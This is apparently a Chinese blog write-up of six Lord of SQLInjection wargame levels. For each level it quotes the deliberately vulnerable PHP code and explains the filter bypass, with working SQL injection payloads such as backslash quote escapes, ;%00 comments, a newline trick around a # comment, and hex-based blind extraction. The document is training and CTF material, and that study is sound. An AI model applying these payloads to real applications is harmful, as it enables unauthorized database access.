Lord-of-SQLInjection-Write-Up(二)

Posted on by Huha1960

assassin

  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/\'/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_assassin where pw like '{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
  if($result['id'] == 'admin') solve("assassin"); 
  highlight_file(__FILE__);

用like进行模糊匹配,百度可知MYSQL语句like语法支持通配符匹配

即like ‘a%’匹配所有以a字符开头的字符串
在这里插入图片描述
如上,存在匹配多条记录的可能
利用burp进行fuzz,发现like ‘9%’能成功匹配出记录,但页面中显示“hello guest”,所以就可以知道,guest与admin的密码第一位相同,而guest记录在admin记录前面,所以无法匹配到admin,以此类推,直到第三位才匹配出admin记录

在这里插入图片描述

succubus

  include "./config.php"; 
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/\'/',$_GET[id])) exit("HeHe");
  if(preg_match('/\'/',$_GET[pw])) exit("HeHe");
  $query = "select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) solve("succubus"); 
  highlight_file(__FILE__);

对单引号进行了过滤,但没有对反斜杆进行过滤,通过注入\可以吃掉一个单引号,造成单引号逃逸

payload

?id=\&amp;pw=or 1%23

ZOMBIE_ASSASSIN

  include "./config.php"; 
  login_chk(); 
  $db = dbconnect();
  $_GET['id'] = strrev(addslashes($_GET['id']));
  $_GET['pw'] = strrev(addslashes($_GET['pw']));
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_zombie_assassin where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) solve("zombie_assassin"); 
  highlight_file(__FILE__);

与上面那题有异曲同工之初,同样是利用反斜杠进行单引号逃逸
addslashes转义了反斜杠,但也是用反斜杠进行的转义,合理利用这个特点即能进行绕过

payload

?id=%00&amp;pw=%231 ro

nightmare

  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)|#|-/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(strlen($_GET[pw])&gt;6) exit("No Hack ~_~"); 
  $query = "select id from prob_nightmare where pw=('{$_GET[pw]}') and id!='admin'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) solve("nightmare"); 
  highlight_file(__FILE__);

对长度和常规注释符号进行过滤
注释符使用;%00
逻辑运算符换用^

payload

?pw=')^0;%00

xavis

因为这次的密码是韩文,需要利用hex()函数装换为十六进制,爆破出十六进制字符串

payload

?pw=1′ or id=’admin’ and ord(substr(hex(pw),27,1))>79%23

DRAGON

  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_dragon where id='guest'# and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
  if($result['id'] == 'admin') solve("dragon");
  highlight_file(__FILE__);

寻找突破#注释的方法,发现#是单行注释,顾名思义,不能注释下一行的内容,这就是突破点
传入%0a作为换行符

payload

?pw=1'%0aand pw = '1'or id='admin'%23

发表评论

邮箱地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据